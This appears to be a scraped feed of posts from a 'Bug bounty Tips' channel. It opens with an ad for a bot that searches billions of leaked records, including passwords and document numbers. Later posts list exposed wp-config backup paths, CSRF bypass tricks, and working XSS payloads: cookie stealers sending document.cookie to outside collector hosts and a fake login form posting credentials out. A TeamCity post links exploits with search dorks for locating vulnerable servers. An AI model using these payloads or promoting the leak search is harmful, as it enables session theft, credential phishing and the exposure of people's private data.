Bug bounty Tips

💧 At the moment, our bot is loaded with 2078 leaks. ✏️ In total they contain 52.536.415.358 records. 😲 This is more than any other telegram bot! 🔎 The following data is available for search: 📩Email: 23.841.454.924 👤Full name: 9.297.275.706 📞Telephone: 6.820.638.162 👤Nick: 4.576.677.061 🔑Password: 2.777.429.639 🃏Document Number: 1.487.310.933 🆔VK ID: 1.193.605.990 ⓕFacebookID: 824.900.847 🎯IP: 453.335.698 🔗Link: 301.684.979 🏢Company name: 297.019.478 🚘Vehicle number: 284.274.869 🌐Domain: 180.748.922 ✈TelegramID: 154.968.917 📷Instagram ID: 45.089.233

Thread by @tabaahi_ on Thread Reader App – Thread Reader App https://threadreaderapp.com/thread/1571386282835873792.html

Thank a lot guys, u guys are giving me a positivity to go forward and learn new things

700 guys 😍😍

Heroku api key, this much what should I have to do

How to find Broken Authentication in 30 seconds or less using Autorize

👉Setup Your Autorize in Burp 1. Proxy traffic through Burp 2. Browse the application 3. Select requests -> Extensions -> Autorize -> Send to Autorize 4. Check the "Unauthenticated" tab and column

🚨Here is a list of WP-exposed (wp-config sensitive) files!🚨 /wp-config.php-backup /wp-config.php.orig /.wp-config.php.swp /wp-config-sample.php /wp-config.inc /wp-config.old /wp-config.txt /wp-config.php.txt /wp-config.php.bak /wp-config.php.old /wp-config.php.dist /wp-config.php.inc /wp-config.php.swp /wp-config.php.html /wp-config-backup.txt /wp-config.php.save /wp-config.php~ /wp-config.php.original /_wpeprivate/config.json

Bugbounty Practice Lab by TCM Security. Follow this guide to setup in Kali Linux! Step 1: Installing required packages sudo apt update sudo apt upgrade sudo apt install docker.io sudo apt install docker-compose Restart your Kali VM. Step 2: Unpack the labsCope the labs to a directory on your system (e.g. /home/kali/labs) cd /home/kali/labs unzip bugbounty-v1.0.zip cd bugbounty sudo docker-compose up The first time you run this it will take some time because it needs to download the docker images to your machine. Next time you run it, it should only take 5-30 seconds. Step 3: Setup permissionsIn a different terminal, navigate to where you unzipped the lab (e.g. /home/kali/labs/bugbounty) and run the set-permissions.sh script. This is used for labs that require write access, such as the file upload attacks. ./set-permissions.sh Browse to http://localhost The first time you load the lab the database will need to be initialized, just follow the instructions in the red box by clicking the link, then coming back to the homepage. Enjoy your labs!

🌟DNS Enumeration 🌟 1. DIG: - Importance: Command-line tool for querying DNS information. 2. Host: - Importance: Command-line utility for DNS queries. 3. NMAP (dns-brute script): - Importance: Network scanning tool to identify subdomains and IPs. 4. DNS Recon: - Importance: Dedicated tool for automated DNS information gathering. 5. SecurityTrails: - Importance: Online service for historical DNS data exploration. Importance of DNS Enumeration: - Subdomain Discovery: Identify potential entry points. - IP Address Mapping: Understand target infrastructure. - Vulnerability Assessment: Spot DNS misconfigurations. - Attack Surface Mapping: Identify hosts and services. - *Information Gathering:* Extract valuable domain-related data. DNS enumeration is vital for comprehensively understanding a target's infrastructure and potential vulnerabilities during security assessments.

CSRF - Bypasses 1. Remove the entire token parameter with value/Remove just the value. 2. Use any other random but same length token. 3. Use any other random (length-1) or (length+1) token. 4. Use attacker's token in victim's session. 5. Change the method from POST to GET and remove the token. 6. If request is made through PUT or DELETE then try POST 7. If token is sent through custom header; try to remove the header. 8. Change the Content-Type to application/json, application/x-url-encoded or form-multipart, text/xml, application/xml. 9. If double submit token is there (in cookies and some header) then try CRLF injection. 10. Bypassing referrer check: i. If the referrer header is checked but only when it exists in the request then add this piece of code in your csrf poc:

<meta name="referrer" content="never">

ii. Regex Referral bypass: 11. CSRF token stealing via xss/htmli/cors. 12. JSON Based: i. Change the Content-Type to text/plain, application/x-www-form-urlencoded, multipart/form-data and check if it accepts. ii. Use flash + 307 redirect. 13. Guessable CSRF token. 14. Clickjacking to strong CSRF token bypass. 15. Type Juggling. 16. Array: newemail=victim@gmail.com&csrftoken[]=lol 17. Set the csrf token to "null" or add null bytes. 18. Check whether csrf token is sent over http or sent to 3rd party. See here 19. Generate multiple csrf tokens, observe the static part. Keep it as it is and play with the dynamic part.

If you got a chance to choose one thing! What will you choose? Guys let's discuss 🤘

<A HREF="http://evil.com/">Login Here </A> <script>document.location.href="http://evil.com"</script> <h3>Please login to proceed</h3> <form action=http://abp16yqa8m56p2kznk76xvmnqew5kwakz.oastify.com>Username:<br><input type="username" name="username"></br>Password:<br><input type="password" name="password"></br><br><input type="submit" value="Login"></br> csp bypass: <script>alert(1)</script>&token=;script-src-elem 'unsafe-inline' iframe: "><iframe src="https://nasa.gov" style="border: 0; position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100%"> <IFRAME SRC="javascript:alert(document.cookie);"></iframe> cookie stealer: <script>document.location='http://sb7j6gqs845opkkhn27oxdm5qwwnks8h.oastify.com?c='+document.cookie</script> <script>new Image().src="http://localhost/cookie.php?c="+document.cookie</script> <script>document.body.background=”https://www.jhadol.com/images/photos/original/1465212129eukl.jpg“;</script> <script>window.location=”https://coffinxp.000webhostapp.com/coffinxp1.html”;</script> <script>document.body.bgColor=”red”;</script>

if you guys like this give me a reaction guys.

Good morning, i have created a video on how to use @cipherinfo_bot, i have shown the demo here you guys can check it out. caution: education purpose only, i am not liable for anything.

CVE-2024-27198 & CVE-2024-27199 Authentication Bypass --> RCE in JetBrains TeamCity exploit https://github.com/W01fh4cker/CVE-2024-27198-RCE https://github.com/Chocapikk/CVE-2024-27198 https://github.com/rapid7/metasploit-framework/pull/18922 Cyberspace Mapping Dork:

Fofa
app="JET_BRAINS-TeamCity"

ZoomEye
app:"JetBrains TeamCity"

Hunter.how
product.name="TeamCity"

Shodan
http.component:"teamcity"

Read research: https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/